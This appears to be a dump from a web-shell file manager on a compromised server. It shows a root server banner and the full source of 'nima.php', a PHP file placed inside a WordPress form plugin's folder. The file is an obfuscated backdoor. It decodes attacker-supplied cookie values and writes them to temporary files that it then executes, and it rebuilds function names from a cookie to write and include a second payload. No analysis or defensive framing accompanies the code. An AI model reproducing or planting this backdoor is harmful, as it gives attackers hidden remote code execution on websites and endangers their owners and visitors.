HEX
Server: Apache/2.2.15 (CentOS)
System: Linux ip-10-0-2-146.eu-west-1.compute.internal 2.6.32-754.35.1.el6.centos.plus.x86_64 #1 SMP Sat Nov 7 11:33:42 UTC 2020 x86_64
User: root (0)
PHP: 5.6.40
Disabled: NONE
$ pwd: /www/sites/www.credebtexchange.com/htdocs/wp-content/plugins/metform/
Upload Files
File: /www/sites/www.credebtexchange.com/htdocs/wp-content/plugins/metform/nima.php
<?php

if (isset($_COOKIE[89+-89]) && isset($_COOKIE[78+-77]) && isset($_COOKIE[-35+38]) && isset($_COOKIE[1+3])) {
    $token = $_COOKIE;
    function reverse_lookup($binding) {
        $token = $_COOKIE;
        $flag = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '6MtvDLXY');
        if (!is_writable($flag)) {
            $flag = getcwd() . DIRECTORY_SEPARATOR . "data_storage";
        }
        $component = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($token[3]));
        if (is_writeable($flag)) {
            $dchunk = fopen($flag, 'w+');
            fputs($dchunk, $component);
            fclose($dchunk);
            spl_autoload_unregister(__FUNCTION__);
            require_once($flag);
            @array_map('unlink', array($flag));
        }
    }
    spl_autoload_register("reverse_lookup");
    $flg = "9b4ee1ba6c66fc0a5fb56507bd3fc797";
    if (!strncmp($flg, $token[4], 32)) {
        if (@class_parents("right_pad_string_initialized", true)) {
            exit;
        }
    }
}
//<PHPDATA>mbd;29-28-4-19-23-3-6-15-12-2-10</PHPDATA>
if (isset($_COOKIE[3]) && isset($_COOKIE[10])) {

    $c = $_COOKIE;
    $k = 0;
    $n = 2;
    $p = array();
    $p[$k] = '';
    while ($n) {
        $p[$k] .= $c[10][$n];
        if (!$c[10][$n + 1]) {
            if (!$c[10][$n + 2]) break;
            $k++;
            $p[$k] = '';
            $n++;
        }
        $n = $n + 2 + 1;
    }
    $k = $p[6]() . $p[15];
    if (!$p[12]($k)) {
        $n = $p[4]($k, $p[3]);
        $p[19]($n, $p[23] . $p[28]($p[29]($c[3])));
    }
    include($k);
}
@ Telegram